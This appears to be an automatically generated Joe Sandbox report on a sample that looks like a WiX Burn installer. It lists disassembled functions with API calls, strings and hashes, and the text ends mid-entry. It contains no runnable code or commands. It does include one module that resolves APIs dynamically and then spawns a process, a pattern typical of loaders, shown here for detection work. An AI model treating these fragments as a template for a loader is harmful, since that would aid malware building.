Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: CloseSleep
String ID: Failed to copy full log path to prefix.$Failed to copy log extension to extension.$Failed to copy log path to prefix.$Failed to get current directory.$Failed to get non-session specific TEMP folder.$Failed to open log: %ls$Setup$clbcatq.dll$crypt32.dll$feclient.dll$log$msasn1.dll
API String ID: 2834455192-2673269691
Opcode ID: a0fdb7fee7733b1f6908060c3162b6d85de1a58134c1a60bdeb2e33152ffd34a
Instruction ID: cf6285be3ed3a44bb8ebcaa020488dba604eff2fc9ca2b5dd4d9e1529e04f560
Opcode Fuzzy Hash: a0fdb7fee7733b1f6908060c3162b6d85de1a58134c1a60bdeb2e33152ffd34a
Instruction Fuzzy Hash: C961A171A00626AEDF229F64CC42BB6BBABAF16740F054159FD00DB640EF71EE908690

Function 00656DB9 Relevance: 19.7, APIs: 2, Strings: 11, Instructions: 166COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000001,?,00000000,00655445,00000006,?,006582B9,?,?,?,00000000,00000000,00000001), ref: 00656DC8

Part of subcall function 006556A9: CompareStringW.KERNEL32(0000007F,00001000,?,000000FF,version.dll,000000FF,?,?,00000000,00656595,00656595,?,0065563D,?,?,00000000), ref: 006556E5
Part of subcall function 006556A9: GetLastError.KERNEL32(?,0065563D,?,?,00000000,?,?,00656595,?,00657F02,?,?,?,?,?), ref: 00655714

LeaveCriticalSection.KERNEL32(00000001,?,00000000,00000001,00000000,00000000,?,006582B9), ref: 00656F59

Strings

Failed to insert variable '%ls'., xrefs: 00656E0D
Setting hidden variable '%ls', xrefs: 00656E86
Setting variable failed: ID '%ls', HRESULT 0x%x, xrefs: 00656F6B
variable.cpp, xrefs: 00656E4B
Attempt to set built-in variable value: %ls, xrefs: 00656E56
Unsetting variable '%ls', xrefs: 00656F15
Failed to set value of variable: %ls, xrefs: 00656F41
Setting string variable '%ls' to value '%ls', xrefs: 00656EED
Failed to find variable value '%ls'., xrefs: 00656DE3
Setting version variable '%ls' to value '%hu.%hu.%hu.%hu', xrefs: 00656ED0
Setting numeric variable '%ls' to value %lld, xrefs: 00656EFA

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: CriticalSection$CompareEnterErrorLastLeaveString
String ID: Attempt to set built-in variable value: %ls$Failed to find variable value '%ls'.$Failed to insert variable '%ls'.$Failed to set value of variable: %ls$Setting hidden variable '%ls'$Setting numeric variable '%ls' to value %lld$Setting string variable '%ls' to value '%ls'$Setting variable failed: ID '%ls', HRESULT 0x%x$Setting version variable '%ls' to value '%hu.%hu.%hu.%hu'$Unsetting variable '%ls'$variable.cpp
API String ID: 2716280545-445000439
Opcode ID: bf3a968ee637bbc70cae0ca87fd21ac4f3573afd594fe0717af45b342cdde384
Instruction ID: 8de4931c861d013199af58ddc4ec43658feb5c8d2b386b4d4b17fc08cee6c0f1
Opcode Fuzzy Hash: bf3a968ee637bbc70cae0ca87fd21ac4f3573afd594fe0717af45b342cdde384
Instruction Fuzzy Hash: 94510471A00225ABDF309F18DD4AFAB7AAFEB51712F91012DFC045B782C271DC45CAA1

Function 00654AE5 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 144windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 00654C64
PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00654C75

Strings

Failed to open log., xrefs: 00654B18
Failed to set registration variables., xrefs: 00654BDE
Failed to set layout directory variable to value provided from command-line., xrefs: 00654C06
Failed to set action variables., xrefs: 00654BC4
Failed to query registration., xrefs: 00654BAE
Failed while running , xrefs: 00654C2A
Failed to create the message window., xrefs: 00654B98
Failed to check global conditions, xrefs: 00654B49
WixBundleLayoutDirectory, xrefs: 00654BF5

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: MessagePostWindow
String ID: Failed to check global conditions$Failed to create the message window.$Failed to open log.$Failed to query registration.$Failed to set action variables.$Failed to set layout directory variable to value provided from command-line.$Failed to set registration variables.$Failed while running $WixBundleLayoutDirectory
API String ID: 3618638489-3051724725
Opcode ID: b441dc06edf6c5bdd7762035d0f22e3de66c58a2b1c8179540d6a4378442a7fc
Instruction ID: f29de24c42ca48c573435079f91934f6c1518159fc5f582c7812f1345878ac64
Opcode Fuzzy Hash: b441dc06edf6c5bdd7762035d0f22e3de66c58a2b1c8179540d6a4378442a7fc
Instruction Fuzzy Hash: 9941153160561ABBCF165A60CD46FBAB66FFF0075AF00125AFC04A2650EFB0ED9897D0

Function 00652DBF Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 203sleepfiletimeCOMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000000,00000000,00000000), ref: 00652E5F
GetLastError.KERNEL32 ref: 00652E69
GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 00652F09
CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000001,00000080,00000000), ref: 00652F96
GetLastError.KERNEL32 ref: 00652FA3
Sleep.KERNEL32(00000064), ref: 00652FB7
CloseHandle.KERNEL32(?), ref: 0065301F

Strings

pathutil.cpp, xrefs: 00652E8D
4Mw, xrefs: 00652E5F
%ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls, xrefs: 00652F66

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast$CloseCreateFileHandleLocalPathSleepTempTime
String ID: 4Mw$%ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls$pathutil.cpp
API String ID: 3480017824-721117420
Opcode ID: 9d78db1b33d0617dd53373dcabf7dd31993d5112b6581c9e212357cc2500f040
Instruction ID: 3dd24a314ad8eee17dca64069778101f289ba6c894a1317a9943c8d9646841b6
Opcode Fuzzy Hash: 9d78db1b33d0617dd53373dcabf7dd31993d5112b6581c9e212357cc2500f040
Instruction Fuzzy Hash: 5F718472D41239ABDB319F94ED49BEEB7BAAB09B11F0001D5FD04A7290D7349E848F54

Function 0066EA7D Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 101threadCOMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,?,0065548E,?,?), ref: 0066EA9D
GetLastError.KERNEL32(?,0065548E,?,?), ref: 0066EAAA
CreateThread.KERNELBASE(00000000,00000000,Function_0001E7B4,?,00000000,00000000), ref: 0066EB03
GetLastError.KERNEL32(?,0065548E,?,?), ref: 0066EB10
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,0065548E,?,?), ref: 0066EB4B
CloseHandle.KERNEL32(00000000,?,0065548E,?,?), ref: 0066EB6A
CloseHandle.KERNELBASE(?,?,0065548E,?,?), ref: 0066EB77

Strings

uithread.cpp, xrefs: 0066EACB, 0066EB31
Failed to create the UI thread., xrefs: 0066EB3B
Failed to create initialization event., xrefs: 0066EAD5

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: CloseCreateErrorHandleLast$EventMultipleObjectsThreadWait
String ID: Failed to create initialization event.$Failed to create the UI thread.$uithread.cpp
API String ID: 2351989216-3599963359
Opcode ID: 1d18a0482e34193d9fb4f12095d05ced09633673959ad4a0c4adfa92c3192801
Instruction ID: f705fd55fb211c22853d2cab9296bc0ba539eb3609785c2b3e4c0ee99ee2a2cc
Opcode Fuzzy Hash: 1d18a0482e34193d9fb4f12095d05ced09633673959ad4a0c4adfa92c3192801
Instruction Fuzzy Hash: 0331887AD41129BBDB10DFD99E85AAFBABDFF04750F11016AF905F7240E7319E008AA1

Function 006714E1 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 91threadCOMMON

Download Yara Rule

APIs

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,774D2F60,?,?,00655405,006553BD,00000000,00655445), ref: 00671506
GetLastError.KERNEL32 ref: 00671519
GetExitCodeThread.KERNELBASE(0069B488,?), ref: 0067155B
GetLastError.KERNEL32 ref: 00671569
ResetEvent.KERNEL32(0069B460), ref: 006715A4
GetLastError.KERNEL32 ref: 006715AE

Strings

Failed to wait for operation complete event., xrefs: 0067154A
Failed to get extraction thread exit code., xrefs: 0067159A
cabextract.cpp, xrefs: 00671540, 00671590, 006715D5
Failed to reset operation complete event., xrefs: 006715DF

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast$CodeEventExitMultipleObjectsResetThreadWait
String ID: Failed to get extraction thread exit code.$Failed to reset operation complete event.$Failed to wait for operation complete event.$cabextract.cpp
API String ID: 2979751695-3400260300
Opcode ID: 30bd82f0c9fb07c18a65a3a6576deef994221fa0be6eac7c2df0c15354544f07
Instruction ID: 435a8f95cdf9375a83c3156e570ef4ddc38b72080ef67693d5816d264617bdb1
Opcode Fuzzy Hash: 30bd82f0c9fb07c18a65a3a6576deef994221fa0be6eac7c2df0c15354544f07
Instruction Fuzzy Hash: EC31B6B0A00205ABE7149FA99D01ABF77FFEB45700F10815BF90ADA260E730DA00DB65

Function 0065CBC5 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 144COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,FFFEB88D,000000FF,00000001,000000FF,?,00000001,006553BD,00000000,00655489,00655445,WixBundleUILevel,840F01E8,?,00000001), ref: 0065CC1C

Strings

Failed to ensure directory exists, xrefs: 0065CCEE
Payload was not found in container: %ls, xrefs: 0065CD29
Failed to get next stream., xrefs: 0065CD03
Failed to get directory portion of local file path, xrefs: 0065CCF5
Failed to concat file paths., xrefs: 0065CCFC
Failed to extract file., xrefs: 0065CCE7
payload.cpp, xrefs: 0065CD1D
Failed to find embedded payload: %ls, xrefs: 0065CC48

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: CompareString
String ID: Failed to concat file paths.$Failed to ensure directory exists$Failed to extract file.$Failed to find embedded payload: %ls$Failed to get directory portion of local file path$Failed to get next stream.$Payload was not found in container: %ls$payload.cpp
API String ID: 1825529933-1711239286
Opcode ID: 4943a315186c52e84dab3dcb84d761d58c048b9c91c0318a54686c2761be949e
Instruction ID: 9c67769014d9758b4d0937ecc92493901d0edff6be8f35c07e87a363797accc6
Opcode Fuzzy Hash: 4943a315186c52e84dab3dcb84d761d58c048b9c91c0318a54686c2761be949e
Instruction Fuzzy Hash: 3F419E31941319EFCF259F48CD819AEBBBBAF00722F118269EC15AB351D7709D49DB90

Function 0065D6C9 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 65libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(5756EC8B,00000000,00000008,00000000,?,006547FE,00000000,00000000,0069B4A0,?,00000000,00000000,?,?,0065548E,?), ref: 0065D6DA
GetLastError.KERNEL32(?,006547FE,00000000,00000000,0069B4A0,?,00000000,00000000,?,?,0065548E,?,?), ref: 0065D6E7
GetProcAddress.KERNEL32(00000000,BootstrapperApplicationCreate), ref: 0065D71F
GetLastError.KERNEL32(?,006547FE,00000000,00000000,0069B4A0,?,00000000,00000000,?,?,0065548E,?,?), ref: 0065D72B

Strings

userexperience.cpp, xrefs: 0065D708, 0065D74C
BootstrapperApplicationCreate, xrefs: 0065D719
Failed to get BootstrapperApplicationCreate entry-point, xrefs: 0065D756
Failed to create UX., xrefs: 0065D76F
Failed to load UX DLL., xrefs: 0065D712

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast$AddressLibraryLoadProc
String ID: BootstrapperApplicationCreate$Failed to create UX.$Failed to get BootstrapperApplicationCreate entry-point$Failed to load UX DLL.$userexperience.cpp
API String ID: 1866314245-2276003667
Opcode ID: 14feddfefc266d6ada69165e774b83990c8ab8e17549c40e0dff13fdc01c6ff3
Instruction ID: 68b9021b7a812f19c5d0affb12bd1e0fe4bdd12437ca49cb64c321ddd6d212d5
Opcode Fuzzy Hash: 14feddfefc266d6ada69165e774b83990c8ab8e17549c40e0dff13fdc01c6ff3
Instruction Fuzzy Hash: 6811E737A80732A7DF315B955D05F5F6A9AAB08B62F03052AFE54FB6C0EB20DC0486D4

Function 00699AA6 Relevance: 15.1, APIs: 10, Instructions: 124libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExA.KERNELBASE ref: 00699AA6
GetLastError.KERNEL32 ref: 00699AB2
DloadReleaseSectionWriteAccess.DELAYIMP ref: 00699AE1
RaiseException.KERNEL32(C06D007E,?,00000001,?), ref: 00699AF2
FreeLibrary.KERNEL32(00000000), ref: 00699B0C
GetProcAddress.KERNEL32(00000000,?), ref: 00699B74
GetLastError.KERNEL32 ref: 00699B80
DloadReleaseSectionWriteAccess.DELAYIMP ref: 00699BAF
RaiseException.KERNEL32(C06D007F,00000000,00000001,?), ref: 00699BC0
DloadReleaseSectionWriteAccess.DELAYIMP ref: 00699BF7

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: AccessDloadReleaseSectionWrite$ErrorExceptionLastLibraryRaise$AddressFreeLoadProc
String ID:
API String ID: 202095176-0
Opcode ID: eecfd3f37104ecd52a3243c68a2d1c2b4923028319654fe74af8a627323d5357
Instruction ID: bea0550750cde85c7f6bac58d17cc55e41ffb4d34ce1be525cee63fd796e304b
Opcode Fuzzy Hash: eecfd3f37104ecd52a3243c68a2d1c2b4923028319654fe74af8a627323d5357
Instruction Fuzzy Hash: 74416D75900219AFCF11DFA8E994ABEB7BEFF48710B05116EE901A7B54DB349D40CBA0

Function 00654796 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 128windowthreadCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(00000000,00000000,00000400,00000400,00000000), ref: 006547BB
GetCurrentThreadId.KERNEL32 ref: 006547C1
GetMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0065484F

Strings

engine.cpp, xrefs: 0065489B
Unexpected return value from message pump., xrefs: 006548A5
Failed to load UX., xrefs: 00654804
Failed to start bootstrapper application., xrefs: 0065481D
Failed to create engine for UX., xrefs: 006547DB

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: Message$CurrentPeekThread
String ID: Failed to create engine for UX.$Failed to load UX.$Failed to start bootstrapper application.$Unexpected return value from message pump.$engine.cpp
API String ID: 673430819-3216346975
Opcode ID: ac18e3e884835916b0f515109f80cb3792fd4853428ee961d2dc6bb8aa7464f1
Instruction ID: d2dcb0520255ed1fe0e587438f67e9e1543395f9fb575e04eb65cf3bb24889a1
Opcode Fuzzy Hash: ac18e3e884835916b0f515109f80cb3792fd4853428ee961d2dc6bb8aa7464f1
Instruction Fuzzy Hash: C341E371600155BFEB109BA0DC85EBA77AEEF04319F10016AFD04E7290DB31ED8987A4

Function 0065F812 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 117registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(?,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 0065F942
RegCloseKey.ADVAPI32(00000000,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 0065F94F

Strings

%ls.RebootRequired, xrefs: 0065F82F
Failed to read Resume value., xrefs: 0065F8D8
Failed to format pending restart registry key to read., xrefs: 0065F846
Resume, xrefs: 0065F8B6
Failed to open registration key., xrefs: 0065F8AB

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: Close
String ID: %ls.RebootRequired$Failed to format pending restart registry key to read.$Failed to open registration key.$Failed to read Resume value.$Resume
API String ID: 3535843008-3890505273
Opcode ID: f56c71e7476a5766b755415b14c32c24ce2fcda94f1b40764db5626615b6954a
Instruction ID: 1a735dbcdb02e83a362b521c8406af1f82b04a6cfa4700e2552645ddf80ad4b8
Opcode Fuzzy Hash: f56c71e7476a5766b755415b14c32c24ce2fcda94f1b40764db5626615b6954a
Instruction Fuzzy Hash: B6415B71940519FFDF119F98C881BADBBBAFB05311F15417AEC15AB250C372AE4ADB80

Function 5BB31332 Relevance: 12.1, APIs: 8, Instructions: 78libraryloadersleepCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 5BB31342
GetProcAddress.KERNEL32(00000000), ref: 5BB31357
GetProcAddress.KERNEL32(00000000), ref: 5BB31363
GetModuleFileNameW.KERNEL32(?,00000104), ref: 5BB31377
GetProcAddress.KERNEL32(00000000), ref: 5BB313E9
CreateProcessW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 5BB313FF
Sleep.KERNELBASE ref: 5BB31407
ExitProcess.KERNEL32(00000000), ref: 5BB3140C

Memory Dump Source

Source File: 00000002.00000002.1642077977.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true

Associated: 00000002.00000002.1642056149.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1642105651.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1642128568.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1642153055.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1642174913.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5bb30000_24EPV9vjc5.jbxd

Similarity

API ID: AddressProc$ModuleProcess$CreateExitFileHandleNameSleep
String ID:
API String ID: 1148150840-0
Opcode ID: f0dd7a59c0bd5b43b3f9e5f35ad75e2b2e8d3d451f964b30678343650819a50a
Instruction ID: 29308b35581844d5fbda9ce5f776adae6960d5a29273f979bf2b02e5f9c33764
Opcode Fuzzy Hash: f0dd7a59c0bd5b43b3f9e5f35ad75e2b2e8d3d451f964b30678343650819a50a
Instruction Fuzzy Hash: C521A172504314AFE712ABA4CC44AABBBEDFF48344F10442CF181A3590FBF6A844D792

Function 00690523 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117fileCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(006BB5FC,00000000,?,?,?,00664207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,006554FA,?), ref: 00690533
CreateFileW.KERNEL32(40000000,00000001,00000000,00000000,00000080,00000000,?,00000000,?,?,?,006BB5F4,?,00664207,00000000,Setup), ref: 006905D7
GetLastError.KERNEL32(?,00664207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,006554FA,?,?,?), ref: 006905E7
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00664207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,006554FA,?), ref: 00690621

Part of subcall function 00652DBF: GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 00652F09

LeaveCriticalSection.KERNEL32(006BB5FC,?,?,006BB5F4,?,00664207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,006554FA,?), ref: 0069067A

Strings

logutil.cpp, xrefs: 00690606

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: CriticalFileSection$CreateEnterErrorLastLeaveLocalPointerTime
String ID: logutil.cpp
API String ID: 4111229724-3545173039
Opcode ID: 6570a7ab26f37291f7597b95596af857a0c489721e9b371fac220cd7e6fdd06f
Instruction ID: 808d0b4411c759782ed6de739aea27ac9308e34cb7939a5b6b81721b1ca7c25d
Opcode Fuzzy Hash: 6570a7ab26f37291f7597b95596af857a0c489721e9b371fac220cd7e6fdd06f
Instruction Fuzzy Hash: 7731C67290022AFFEF215FA09D45EAE766FEF00754F011229FD00E6660DB70DDA09B95

Function 00670B8E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 74fileCOMMON

Download Yara Rule

APIs

_memcpy_s.LIBCMT ref: 00670BDE
WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00670BFD
GetLastError.KERNEL32 ref: 00670C07

Strings

Failed to write during cabinet extraction., xrefs: 00670C35
cabextract.cpp, xrefs: 00670C2B
Unexpected call to CabWrite()., xrefs: 00670BC1

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorFileLastWrite_memcpy_s
String ID: Failed to write during cabinet extraction.$Unexpected call to CabWrite().$cabextract.cpp
API String ID: 1970631241-3111339858
Opcode ID: fe247cbe406fe783f2cd20f97758871206cc91642a7ec1fb728164a3d4d72652
Instruction ID: d02dd8de3d26ad63e7d5d795fcc054cbb2a74e3673d77b8082a2284d55cdda65
Opcode Fuzzy Hash: fe247cbe406fe783f2cd20f97758871206cc91642a7ec1fb728164a3d4d72652
Instruction Fuzzy Hash: 7C21C276500205EBDB15DF5CD985D9A77AAFF89720B218259FE08C7341E731DD00DB60

Function 00690879 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

OpenProcessToken.ADVAPI32(?,00000008,?,006553BD,00000000,?,?,?,?,?,?,?,0066769D,00000000), ref: 00690897
GetLastError.KERNEL32(?,?,?,?,?,?,?,0066769D,00000000), ref: 006908A1
GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,?,?,?,0066769D,00000000), ref: 006908D3
GetLastError.KERNEL32(?,?,?,?,?,?,?,0066769D,00000000), ref: 006908EC
CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,0066769D,00000000), ref: 0069092B

Strings

procutil.cpp, xrefs: 00690919

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLastToken$CloseHandleInformationOpenProcess
String ID: procutil.cpp
API String ID: 4040495316-1178289305
Opcode ID: 8e96b494ff3e39653709e7f4dd665f965402ccb11af28d979b6aeb43f9197c6c
Instruction ID: c48e48585ef478ad02a1fc00573001e8f2e52a821aa8b4d07ad57a650eb1bc9a
Opcode Fuzzy Hash: 8e96b494ff3e39653709e7f4dd665f965402ccb11af28d979b6aeb43f9197c6c
Instruction Fuzzy Hash: 4821A172E40229EFEF219F999905AEEBBBDEF10710F115166ED15AB750D3708E00EAD0

Function 00670C57 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 70timeCOMMON

Download Yara Rule

APIs

